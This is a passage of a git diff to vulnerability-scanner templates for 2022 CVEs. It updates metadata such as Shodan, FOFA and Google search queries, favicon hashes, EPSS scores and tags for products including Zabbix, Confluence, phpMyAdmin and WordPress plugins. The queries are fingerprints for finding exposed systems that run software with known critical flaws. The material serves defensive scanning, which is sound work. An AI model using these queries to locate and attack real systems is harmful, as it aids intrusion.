b/http/cves/2022/CVE-2022-23134.yaml @@ -27,8 +27,14 @@ info: max-request: 2 vendor: zabbix product: zabbix - shodan-query: http.favicon.hash:892542951 - fofa-query: icon_hash=892542951 + shodan-query: + - http.favicon.hash:892542951 + - http.title:"zabbix-server" + - cpe:"cpe:2.3:a:zabbix:zabbix" + fofa-query: + - icon_hash=892542951 + - app="zabbix-监控系统" && body="saml" + - title="zabbix-server" google-query: intitle:"zabbix-server" tags: cve,cve2022,zabbix,auth-bypass,kev diff --git a/http/cves/2022/CVE-2022-2314.yaml b/http/cves/2022/CVE-2022-2314.yaml index 04b41916be..f64ac52f8f 100644 --- a/http/cves/2022/CVE-2022-2314.yaml +++ b/http/cves/2022/CVE-2022-2314.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-2314 cwe-id: CWE-78,NVD-CWE-noinfo - epss-score: 0.26874 - epss-percentile: 0.96341 + epss-score: 0.37332 + epss-percentile: 0.97185 cpe: cpe:2.3:a:vr_calendar_project:vr_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23347.yaml b/http/cves/2022/CVE-2022-23347.yaml index 0fc09bd71f..4ce3c4eac9 100644 --- a/http/cves/2022/CVE-2022-23347.yaml +++ b/http/cves/2022/CVE-2022-23347.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: bigantsoft product: bigant_server - shodan-query: http.html:"BigAnt" + shodan-query: + - http.html:"BigAnt" + - http.html:"bigant" fofa-query: body="bigant" tags: cve,cve2022,bigant,lfi,bigantsoft diff --git a/http/cves/2022/CVE-2022-23544.yaml b/http/cves/2022/CVE-2022-23544.yaml index 1a6973ce62..7e4ae206a2 100644 --- a/http/cves/2022/CVE-2022-23544.yaml +++ b/http/cves/2022/CVE-2022-23544.yaml @@ -28,8 +28,13 @@ info: max-request: 1 vendor: metersphere product: metersphere - shodan-query: html:"metersphere" - fofa-query: title="MeterSphere" + shodan-query: + - html:"metersphere" + - http.html:"metersphere" + fofa-query: + - title="MeterSphere" + - body="metersphere" + - title="metersphere" tags: cve2022,cve,metersphere,ssrf,oast,xss http: diff --git a/http/cves/2022/CVE-2022-23779.yaml b/http/cves/2022/CVE-2022-23779.yaml index 6ecad729a3..0b60119936 100644 --- a/http/cves/2022/CVE-2022-23779.yaml +++ b/http/cves/2022/CVE-2022-23779.yaml @@ -27,8 +27,11 @@ info: max-request: 1 vendor: zohocorp product: manageengine_desktop_central - fofa-query: app="ZOHO-ManageEngine-Desktop" shodan-query: http.title:"manageengine desktop central 10" + fofa-query: + - app="ZOHO-ManageEngine-Desktop" + - title="manageengine desktop central 10" + - app="zoho-manageengine-desktop" google-query: intitle:"manageengine desktop central 10" tags: cve,cve2022,zoho,exposure,zohocorp diff --git a/http/cves/2022/CVE-2022-2379.yaml b/http/cves/2022/CVE-2022-2379.yaml index 61238c3033..7ae533b31b 100644 --- a/http/cves/2022/CVE-2022-2379.yaml +++ b/http/cves/2022/CVE-2022-2379.yaml @@ -14,13 +14,15 @@ info: - https://wpscan.com/vulnerability/0773ba24-212e-41d5-9ae0-1416ea2c9db6 - https://wordpress.org/plugins/easy-student-results/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2379 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/soxoj/information-disclosure-writeups-and-pocs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-2379 cwe-id: CWE-862 - epss-score: 0.01934 - epss-percentile: 0.87376 + epss-score: 0.02846 + epss-percentile: 0.90702 cpe: cpe:2.3:a:easy_student_results_project:easy_student_results:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23808.yaml b/http/cves/2022/CVE-2022-23808.yaml index 0f57d86547..5874d9dd08 100644 --- a/http/cves/2022/CVE-2022-23808.yaml +++ b/http/cves/2022/CVE-2022-23808.yaml @@ -28,8 +28,13 @@ info: max-request: 2 vendor: phpmyadmin product: phpmyadmin - shodan-query: http.component:"phpmyadmin" - fofa-query: title="phpmyadmin" + shodan-query: + - http.component:"phpmyadmin" + - http.title:"phpmyadmin" + - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin" + fofa-query: + - title="phpmyadmin" + - body="pma_servername" && body="4.8.4" google-query: intitle:"phpmyadmin" hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve,cve2022,phpmyadmin,xss diff --git a/http/cves/2022/CVE-2022-2383.yaml b/http/cves/2022/CVE-2022-2383.yaml index b829368b51..0a986decfa 100644 --- a/http/cves/2022/CVE-2022-2383.yaml +++ b/http/cves/2022/CVE-2022-2383.yaml @@ -26,9 +26,9 @@ info: cpe: cpe:2.3:a:slickremix:feed_them_social:*:*:*:*:*:wordpress:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: slickremix - product: feed_them_social + product: "feed_them_social" framework: wordpress tags: cve,cve2022,wp,wordpress,wp-plugin,wpscan,xss,slickremix flow: http(1) && http(2) diff --git a/http/cves/2022/CVE-2022-23854.yaml b/http/cves/2022/CVE-2022-23854.yaml index 5691148b78..682158a5e9 100644 --- a/http/cves/2022/CVE-2022-23854.yaml +++ b/http/cves/2022/CVE-2022-23854.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: aveva product: intouch_access_anywhere - shodan-query: http.html:"InTouch Access Anywhere" + shodan-query: + - http.html:"InTouch Access Anywhere" + - http.html:"intouch access anywhere" fofa-query: body="intouch access anywhere" tags: cve,cve2022,lfi,packetstorm,aveva,intouch diff --git a/http/cves/2022/CVE-2022-23898.yaml b/http/cves/2022/CVE-2022-23898.yaml index 10812b982d..c551eb69fd 100644 --- a/http/cves/2022/CVE-2022-23898.yaml +++ b/http/cves/2022/CVE-2022-23898.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: mingsoft product: mcms - shodan-query: http.favicon.hash:1464851260 + shodan-query: + - http.favicon.hash:1464851260 + - http.favicon.hash:"1464851260" fofa-query: icon_hash="1464851260" tags: cve,cve2022,sqli,mcms,mingsoft variables: diff --git a/http/cves/2022/CVE-2022-24112.yaml b/http/cves/2022/CVE-2022-24112.yaml index 4e4cf1573e..a0ca8f7ff1 100644 --- a/http/cves/2022/CVE-2022-24112.yaml +++ b/http/cves/2022/CVE-2022-24112.yaml @@ -26,8 +26,12 @@ info: max-request: 2 vendor: apache product: apisix - shodan-query: title:"Apache APISIX Dashboard" - fofa-query: title="Apache APISIX Dashboard" + shodan-query: + - title:"Apache APISIX Dashboard" + - http.title:"apache apisix dashboard" + fofa-query: + - title="Apache APISIX Dashboard" + - title="apache apisix dashboard" google-query: intitle:"apache apisix dashboard" tags: cve,cve2022,apache,rce,apisix,oast,kev,intrusive diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml index 0e3edc5f15..25b04466fb 100644 --- a/http/cves/2022/CVE-2022-24124.yaml +++ b/http/cves/2022/CVE-2022-24124.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: casbin product: casdoor - shodan-query: http.title:"Casdoor" + shodan-query: + - http.title:"Casdoor" + - http.title:"casdoor" fofa-query: title="casdoor" google-query: intitle:"casdoor" tags: cve,cve2022,sqli,unauth,packetstorm,edb,casdoor,casbin diff --git a/http/cves/2022/CVE-2022-2414.yaml b/http/cves/2022/CVE-2022-2414.yaml index dbe557ccd0..a5b83f27c9 100644 --- a/http/cves/2022/CVE-2022-2414.yaml +++ b/http/cves/2022/CVE-2022-2414.yaml @@ -27,8 +27,13 @@ info: max-request: 1 vendor: dogtagpki product: dogtagpki - shodan-query: title:"Identity Management" html:"FreeIPA" - fofa-query: title="Identity Management" + shodan-query: + - title:"Identity Management" html:"FreeIPA" + - http.title:"identity management" html:"freeipa" + fofa-query: + - title="Identity Management" + - title="identity management" + - title="identity management" html:"freeipa" google-query: intitle:"identity management" html:"freeipa" tags: cve,cve2022,dogtag,freeipa,xxe,dogtagpki diff --git a/http/cves/2022/CVE-2022-24260.yaml b/http/cves/2022/CVE-2022-24260.yaml index 15397de3ba..4b04a25393 100644 --- a/http/cves/2022/CVE-2022-24260.yaml +++ b/http/cves/2022/CVE-2022-24260.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: voipmonitor product: voipmonitor - shodan-query: http.title:"VoIPmonitor" + shodan-query: + - http.title:"VoIPmonitor" + - http.title:"voipmonitor" fofa-query: title="voipmonitor" google-query: intitle:"voipmonitor" tags: cve,cve2022,voipmonitor,sqli,unauth diff --git a/http/cves/2022/CVE-2022-24288.yaml b/http/cves/2022/CVE-2022-24288.yaml index 344d622de6..4335f7155b 100644 --- a/http/cves/2022/CVE-2022-24288.yaml +++ b/http/cves/2022/CVE-2022-24288.yaml @@ -28,9 +28,18 @@ info: max-request: 2 vendor: apache product: airflow - shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" - fofa-query: title="sign in - airflow" - google-query: intitle:"sign in - airflow" + shodan-query: + - title:"Airflow - DAGs" || http.html:"Apache Airflow" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + - product:"redis" + fofa-query: + - title="sign in - airflow" + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + google-query: + - intitle:"sign in - airflow" + - intitle:"airflow - dags" || http.html:"apache airflow" tags: cve,cve2022,airflow,rce,apache http: diff --git a/http/cves/2022/CVE-2022-2462.yaml b/http/cves/2022/CVE-2022-2462.yaml index fe117426c4..c7f071301a 100644 --- a/http/cves/2022/CVE-2022-2462.yaml +++ b/http/cves/2022/CVE-2022-2462.yaml @@ -21,15 +21,15 @@ info: cvss-score: 5.3 cve-id: CVE-2022-2462 cwe-id: CWE-200 - epss-score: 0.02698 - epss-percentile: 0.90234 + epss-score: 0.02514 + epss-percentile: 0.90131 cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: transposh product: transposh_wordpress_translation framework: wordpress - tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm,transposh + tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm,transposh,xss http: - method: POST diff --git a/http/cves/2022/CVE-2022-24627.yaml b/http/cves/2022/CVE-2022-24627.yaml index 4de131b055..68e1794fa6 100644 --- a/http/cves/2022/CVE-2022-24627.yaml +++ b/http/cves/2022/CVE-2022-24627.yaml @@ -15,15 +15,17 @@ info: cvss-score: 9.8 cve-id: CVE-2022-24627 cwe-id: CWE-89 - epss-score: 0.00109 - epss-percentile: 0.43163 + epss-score: 0.01642 + epss-percentile: 0.87541 cpe: cpe:2.3:a:audiocodes:device_manager_express:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: audiocodes product: device_manager_express - shodan-query: title:"Audiocodes" + shodan-query: + - title:"Audiocodes" + - http.title:"audiocodes" fofa-query: title="audiocodes" google-query: intitle:"audiocodes" tags: cve,cve2022,seclists,sqli,audiocodes diff --git a/http/cves/2022/CVE-2022-24681.yaml b/http/cves/2022/CVE-2022-24681.yaml index a7845152f0..51cafeb918 100644 --- a/http/cves/2022/CVE-2022-24681.yaml +++ b/http/cves/2022/CVE-2022-24681.yaml @@ -28,9 +28,15 @@ info: max-request: 1 vendor: zohocorp product: manageengine_adselfservice_plus - shodan-query: http.title:"manageengine" - fofa-query: title="manageengine" - google-query: intitle:"adselfservice plus" + shodan-query: + - http.title:"manageengine" + - http.title:"adselfservice plus" + fofa-query: + - title="manageengine" + - title="adselfservice plus" + google-query: + - intitle:"adselfservice plus" + - intitle:"manageengine" tags: cve,cve2022,manageengine,xss,authenticated,zohocorp http: diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml index 0859f89d5c..4683216a4e 100644 --- a/http/cves/2022/CVE-2022-24716.yaml +++ b/http/cves/2022/CVE-2022-24716.yaml @@ -27,9 +27,16 @@ info: max-request: 3 vendor: icinga product: icinga_web_2 - shodan-query: title:"Icinga" - fofa-query: title="icinga web 2 login" - google-query: intitle:"icinga" + shodan-query: + - title:"Icinga" + - http.title:"icinga" + - http.title:"icinga web 2 login" + fofa-query: + - title="icinga web 2 login" + - title="icinga" + google-query: + - intitle:"icinga" + - intitle:"icinga web 2 login" tags: cve,cve2022,packetstorm,icinga,lfi http: diff --git a/http/cves/2022/CVE-2022-24816.yaml b/http/cves/2022/CVE-2022-24816.yaml index e1aa6c65e5..6683437020 100644 --- a/http/cves/2022/CVE-2022-24816.yaml +++ b/http/cves/2022/CVE-2022-24816.yaml @@ -29,7 +29,9 @@ info: vendor: geosolutionsgroup product: jai-ext shodan-query: /geoserver/ - fofa-query: app="GeoServer" + fofa-query: + - app="GeoServer" + - app="geoserver" tags: cve,cve2022,geoserver,rce,geosolutionsgroup http: diff --git a/http/cves/2022/CVE-2022-2487.yaml b/http/cves/2022/CVE-2022-2487.yaml index 7092a9c79e..5be8e1968b 100644 --- a/http/cves/2022/CVE-2022-2487.yaml +++ b/http/cves/2022/CVE-2022-2487.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: wavlink product: wl-wn535k2_firmware - shodan-query: http.title:"Wi-Fi APP Login" + shodan-query: + - http.title:"Wi-Fi APP Login" + - http.title:"wi-fi app login" fofa-query: title="wi-fi app login" google-query: intitle:"wi-fi app login" tags: cve,cve2022,iot,wavlink,router,rce,oast diff --git a/http/cves/2022/CVE-2022-2488.yaml b/http/cves/2022/CVE-2022-2488.yaml index a602a3869f..1a5a25e249 100644 --- a/http/cves/2022/CVE-2022-2488.yaml +++ b/http/cves/2022/CVE-2022-2488.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: wavlink product: wl-wn535k2_firmware - shodan-query: http.title:"Wi-Fi APP Login" + shodan-query: + - http.title:"Wi-Fi APP Login" + - http.title:"wi-fi app login" fofa-query: title="wi-fi app login" google-query: intitle:"wi-fi app login" tags: cve,cve2022,iot,wavlink,router,rce,oast diff --git a/http/cves/2022/CVE-2022-24899.yaml b/http/cves/2022/CVE-2022-24899.yaml index 003da4d752..4a031a0417 100644 --- a/http/cves/2022/CVE-2022-24899.yaml +++ b/http/cves/2022/CVE-2022-24899.yaml @@ -27,8 +27,14 @@ info: max-request: 1 vendor: contao product: contao - shodan-query: title:"Contao" - fofa-query: body="contao open source cms" + shodan-query: + - title:"Contao" + - http.title:"contao" + - http.html:"contao open source cms" + - cpe:"cpe:2.3:a:contao:contao" + fofa-query: + - body="contao open source cms" + - title="contao" google-query: intitle:"contao" tags: cve,cve2022,contao,xss,huntr diff --git a/http/cves/2022/CVE-2022-24990.yaml b/http/cves/2022/CVE-2022-24990.yaml index a76df5be0f..aa7eee32f2 100644 --- a/http/cves/2022/CVE-2022-24990.yaml +++ b/http/cves/2022/CVE-2022-24990.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: terra-master product: terramaster_operating_system - shodan-query: "TerraMaster" + shodan-query: + - "TerraMaster" + - terramaster tags: cve,cve2022,packetstorm,terramaster,exposure,kev,terra-master http: diff --git a/http/cves/2022/CVE-2022-25125.yaml b/http/cves/2022/CVE-2022-25125.yaml index 913fdf5257..5a4f659d3d 100644 --- a/http/cves/2022/CVE-2022-25125.yaml +++ b/http/cves/2022/CVE-2022-25125.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: mingsoft product: mcms - shodan-query: http.favicon.hash:1464851260 + shodan-query: + - http.favicon.hash:1464851260 + - http.favicon.hash:"1464851260" fofa-query: icon_hash="1464851260" tags: cve,cve2022,sqli,mcms,mingsoft variables: diff --git a/http/cves/2022/CVE-2022-25148.yaml b/http/cves/2022/CVE-2022-25148.yaml index 9b2466f4cd..ae3075df31 100644 --- a/http/cves/2022/CVE-2022-25148.yaml +++ b/http/cves/2022/CVE-2022-25148.yaml @@ -27,10 +27,10 @@ info: vendor: veronalabs product: wp_statistics framework: wordpress - google-query: inurl:/wp-content/plugins/wp-statistics - publicwww-query: /wp-content/plugins/wp-statistics/ shodan-query: http.html:/wp-content/plugins/wp-statistics/ fofa-query: body=/wp-content/plugins/wp-statistics/ + publicwww-query: /wp-content/plugins/wp-statistics/ + google-query: inurl:/wp-content/plugins/wp-statistics tags: cve,cve2022,packetstorm,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs http: diff --git a/http/cves/2022/CVE-2022-25149.yaml b/http/cves/2022/CVE-2022-25149.yaml index cfd50046d3..be6c12c2f9 100644 --- a/http/cves/2022/CVE-2022-25149.yaml +++ b/http/cves/2022/CVE-2022-25149.yaml @@ -26,10 +26,10 @@ info: vendor: veronalabs product: wp_statistics framework: wordpress - publicwww-query: "/wp-content/plugins/wp-statistics/" - google-query: inurl:/wp-content/plugins/wp-statistics shodan-query: http.html:/wp-content/plugins/wp-statistics/ fofa-query: body=/wp-content/plugins/wp-statistics/ + publicwww-query: "/wp-content/plugins/wp-statistics/" + google-query: inurl:/wp-content/plugins/wp-statistics tags: cve2022,cve,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs http: diff --git a/http/cves/2022/CVE-2022-2535.yaml b/http/cves/2022/CVE-2022-2535.yaml index a987a5e5be..355f3a1c3e 100644 --- a/http/cves/2022/CVE-2022-2535.yaml +++ b/http/cves/2022/CVE-2022-2535.yaml @@ -25,9 +25,9 @@ info: vendor: searchwp product: searchwp_live_ajax_search framework: wordpress - publicwww-query: "/wp-content/plugins/searchwp-live-ajax-search/" shodan-query: http.html:/wp-content/plugins/searchwp-live-ajax-search/ fofa-query: body=/wp-content/plugins/searchwp-live-ajax-search/ + publicwww-query: "/wp-content/plugins/searchwp-live-ajax-search/" tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search,searchwp http: diff --git a/http/cves/2022/CVE-2022-25356.yaml b/http/cves/2022/CVE-2022-25356.yaml index a863557fae..92deabe1a8 100644 --- a/http/cves/2022/CVE-2022-25356.yaml +++ b/http/cves/2022/CVE-2022-25356.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: altn product: securitygateway - google-query: inurl:"/SecurityGateway.dll" + google-query: + - inurl:"/SecurityGateway.dll" + - inurl:"/securitygateway.dll" tags: cve,cve2022,altn,gateway,xml,injection http: diff --git a/http/cves/2022/CVE-2022-25481.yaml b/http/cves/2022/CVE-2022-25481.yaml index d6c5a5d55f..0c7108892f 100644 --- a/http/cves/2022/CVE-2022-25481.yaml +++ b/http/cves/2022/CVE-2022-25481.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: thinkphp product: thinkphp - shodan-query: title:"ThinkPHP" - fofa-query: title="thinkphp" + shodan-query: + - title:"ThinkPHP" + - http.title:"thinkphp" + - cpe:"cpe:2.3:a:thinkphp:thinkphp" + fofa-query: + - title="thinkphp" + - header="think_lang" google-query: intitle:"thinkphp" tags: cve,cve2022,thinkphp,exposure,oss diff --git a/http/cves/2022/CVE-2022-25486.yaml b/http/cves/2022/CVE-2022-25486.yaml index 7c0e1a6919..0769494883 100644 --- a/http/cves/2022/CVE-2022-25486.yaml +++ b/http/cves/2022/CVE-2022-25486.yaml @@ -13,13 +13,14 @@ info: reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-25486 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-25486 cwe-id: CWE-829 - epss-score: 0.01775 - epss-percentile: 0.8667 + epss-score: 0.01525 + epss-percentile: 0.87021 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml index 645d854f40..bfcae28bb8 100644 --- a/http/cves/2022/CVE-2022-2551.yaml +++ b/http/cves/2022/CVE-2022-2551.yaml @@ -29,7 +29,9 @@ info: vendor: snapcreek product: duplicator framework: wordpress - google-query: inurl:/backups-dup-lite/dup-installer/ + google-query: + - inurl:/backups-dup-lite/dup-installer/ + - inurl:"/wp-content/plugins/duplicator" tags: cve2022,cve,wordpress,wp,wp-plugin,duplicator,wpscan,snapcreek http: diff --git a/http/cves/2022/CVE-2022-25568.yaml b/http/cves/2022/CVE-2022-25568.yaml index a2ee72f049..e29a698c40 100644 --- a/http/cves/2022/CVE-2022-25568.yaml +++ b/http/cves/2022/CVE-2022-25568.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: motioneye_project product: motioneye - shodan-query: html:"MotionEye" + shodan-query: + - html:"MotionEye" + - http.html:"motioneye" fofa-query: body="motioneye" tags: cve,cve2022,motioneye,config,motioneye_project diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index 6cb8ae33eb..3330f4a699 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -29,7 +29,7 @@ info: vendor: anti-malware_security_and_brute-force_firewall_project product: anti-malware_security_and_brute-force_firewall framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan + tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,anti-malware_security_and_brute-force_firewall_project http: - raw: diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml index 2e733b9741..a3695fe80c 100644 --- a/http/cves/2022/CVE-2022-26134.yaml +++ b/http/cves/2022/CVE-2022-26134.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: atlassian product: confluence_data_center - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" tags: cve,cve2022,packetstorm,confluence,rce,ognl,oast,kev,atlassian diff --git a/http/cves/2022/CVE-2022-26138.yaml b/http/cves/2022/CVE-2022-26138.yaml index 1aa280004b..1ad8ae0754 100644 --- a/http/cves/2022/CVE-2022-26138.yaml +++ b/http/cves/2022/CVE-2022-26138.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: atlassian product: questions_for_confluence - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" tags: cve2022,cve,confluence,atlassian,default-login,kev http: diff --git a/http/cves/2022/CVE-2022-26148.yaml b/http/cves/2022/CVE-2022-26148.yaml index 96532ca591..2fcf144a9b 100644 --- a/http/cves/2022/CVE-2022-26148.yaml +++ b/http/cves/2022/CVE-2022-26148.yaml @@ -28,8 +28,14 @@ info: max-request: 1 vendor: grafana product: grafana - shodan-query: title:"Grafana" - fofa-query: app="Grafana" + shodan-query: + - title:"Grafana" + - cpe:"cpe:2.3:a:grafana:grafana" + - http.title:"grafana" + fofa-query: + - app="Grafana" + - title="grafana" + - app="grafana" google-query: intitle:"grafana" tags: cve,cve2022,grafana,zabbix,exposure diff --git a/http/cves/2022/CVE-2022-26159.yaml b/http/cves/2022/CVE-2022-26159.yaml index 0b91d2fb85..6463c6cf7b 100644 --- a/http/cves/2022/CVE-2022-26159.yaml +++ b/http/cves/2022/CVE-2022-26159.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-26159 cwe-id: CWE-425 - epss-score: 0.00597 - epss-percentile: 0.76107 + epss-score: 0.00606 + epss-percentile: 0.78512 cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26263.yaml b/http/cves/2022/CVE-2022-26263.yaml index 177bda32c5..058a23b40d 100644 --- a/http/cves/2022/CVE-2022-26263.yaml +++ b/http/cves/2022/CVE-2022-26263.yaml @@ -28,8 +28,10 @@ info: verified: true vendor: yonyou product: u8\+ - google-query: inurl:/u8sl/WebHelp - tags: cve,cve2022,yonyou,xss + google-query: + - inurl:/u8sl/WebHelp + - inurl:/u8sl/webhelp + tags: cve,cve2022,yonyou,xss,headless headless: - steps: - args: diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml index 5a85695798..63db4f4447 100644 --- a/http/cves/2022/CVE-2022-2627.yaml +++ b/http/cves/2022/CVE-2022-2627.yaml @@ -26,9 +26,11 @@ info: vendor: tagdiv product: newspaper framework: wordpress - publicwww-query: "/wp-content/themes/Newspaper" shodan-query: http.html:/wp-content/themes/newspaper fofa-query: body=/wp-content/themes/newspaper + publicwww-query: + - "/wp-content/themes/Newspaper" + - /wp-content/themes/newspaper tags: cve2022,cve,xss,wordpress,wp,wp-theme,newspaper,wpscan,tagdiv http: diff --git a/http/cves/2022/CVE-2022-2633.yaml b/http/cves/2022/CVE-2022-2633.yaml index a1058dbcb8..1104b7c04a 100644 --- a/http/cves/2022/CVE-2022-2633.yaml +++ b/http/cves/2022/CVE-2022-2633.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.2 cve-id: CVE-2022-2633 cwe-id: CWE-610 - epss-score: 0.07008 - epss-percentile: 0.93291 + epss-score: 0.02868 + epss-percentile: 0.9073 cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-26564.yaml b/http/cves/2022/CVE-2022-26564.yaml index 35c3711134..bd1a120cb2 100644 --- a/http/cves/2022/CVE-2022-26564.yaml +++ b/http/cves/2022/CVE-2022-26564.yaml @@ -28,8 +28,12 @@ info: max-request: 3 vendor: digitaldruid product: hoteldruid - shodan-query: http.favicon.hash:-1521640213 - fofa-query: title="hoteldruid" + shodan-query: + - http.favicon.hash:-1521640213 + - http.title:"hoteldruid" + fofa-query: + - title="hoteldruid" + - icon_hash=-1521640213 google-query: intitle:"hoteldruid" tags: cve,cve2022,hoteldruid,xss,digitaldruid diff --git a/http/cves/2022/CVE-2022-2733.yaml b/http/cves/2022/CVE-2022-2733.yaml index 082f8d651a..41dc47f1ca 100644 --- a/http/cves/2022/CVE-2022-2733.yaml +++ b/http/cves/2022/CVE-2022-2733.yaml @@ -27,8 +27,16 @@ info: max-request: 2 vendor: open-emr product: openemr - shodan-query: title:"OpenEMR" - fofa-query: icon_hash=1971268439 + shodan-query: + - title:"OpenEMR" + - http.html:"openemr" + - http.title:"openemr" + - http.favicon.hash:1971268439 + fofa-query: + - icon_hash=1971268439 + - body="openemr" + - title="openemr" + - app="openemr" google-query: intitle:"openemr" tags: cve,cve2022,xss,openemr,authenticated,huntr,open-emr diff --git a/http/cves/2022/CVE-2022-2756.yaml b/http/cves/2022/CVE-2022-2756.yaml index be6fdc39ce..e2f534bd38 100644 --- a/http/cves/2022/CVE-2022-2756.yaml +++ b/http/cves/2022/CVE-2022-2756.yaml @@ -27,7 +27,9 @@ info: max-request: 3 vendor: kavitareader product: kavita - shodan-query: title:"kavita" + shodan-query: + - title:"kavita" + - http.title:"kavita" fofa-query: title="kavita" google-query: intitle:"kavita" tags: cve,cve2022,ssrf,kavita,authenticated,huntr,intrusive,kavitareader diff --git a/http/cves/2022/CVE-2022-27593.yaml b/http/cves/2022/CVE-2022-27593.yaml index 90e837297d..7bb1a722f8 100644 --- a/http/cves/2022/CVE-2022-27593.yaml +++ b/http/cves/2022/CVE-2022-27593.yaml @@ -29,9 +29,17 @@ info: max-request: 1 vendor: qnap product: photo_station - shodan-query: title:"QNAP" - fofa-query: title="photo station" - google-query: intitle:"qnap" + shodan-query: + - title:"QNAP" + - http.title:"photo station" + - http.title:"qnap" + - 'content-length: 580 "http server 1.0"' + fofa-query: + - title="photo station" + - title="qnap" + google-query: + - intitle:"qnap" + - intitle:"photo station" tags: cve2022,cve,qnap,lfi,kev http: diff --git a/http/cves/2022/CVE-2022-27926.yaml b/http/cves/2022/CVE-2022-27926.yaml index 091d447707..a05b52613f 100644 --- a/http/cves/2022/CVE-2022-27926.yaml +++ b/http/cves/2022/CVE-2022-27926.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: zimbra product: collaboration - fofa-query: app="zimbra-邮件系统" - shodan-query: http.favicon.hash:"1624375939" + shodan-query: + - http.favicon.hash:"1624375939" + - http.favicon.hash:"475145467" + fofa-query: + - app="zimbra-邮件系统" + - icon_hash="475145467" + - icon_hash="1624375939" tags: cve,cve2022,zimbra,xss,kev http: diff --git a/http/cves/2022/CVE-2022-27927.yaml b/http/cves/2022/CVE-2022-27927.yaml index 1ff0eadb94..d0eab25243 100644 --- a/http/cves/2022/CVE-2022-27927.yaml +++ b/http/cves/2022/CVE-2022-27927.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-27927 cwe-id: CWE-89 - epss-score: 0.10451 - epss-percentile: 0.94459 + epss-score: 0.33545 + epss-percentile: 0.97064 cpe: cpe:2.3:a:microfinance_management_system_project:microfinance_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27984.yaml b/http/cves/2022/CVE-2022-27984.yaml index 5c9b564a9c..bb0dfd0968 100644 --- a/http/cves/2022/CVE-2022-27984.yaml +++ b/http/cves/2022/CVE-2022-27984.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-27984 cwe-id: CWE-89 - epss-score: 0.03664 - epss-percentile: 0.90798 + epss-score: 0.02079 + epss-percentile: 0.89045 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28219.yaml b/http/cves/2022/CVE-2022-28219.yaml index a1abe5b0a7..4b7ecc162d 100644 --- 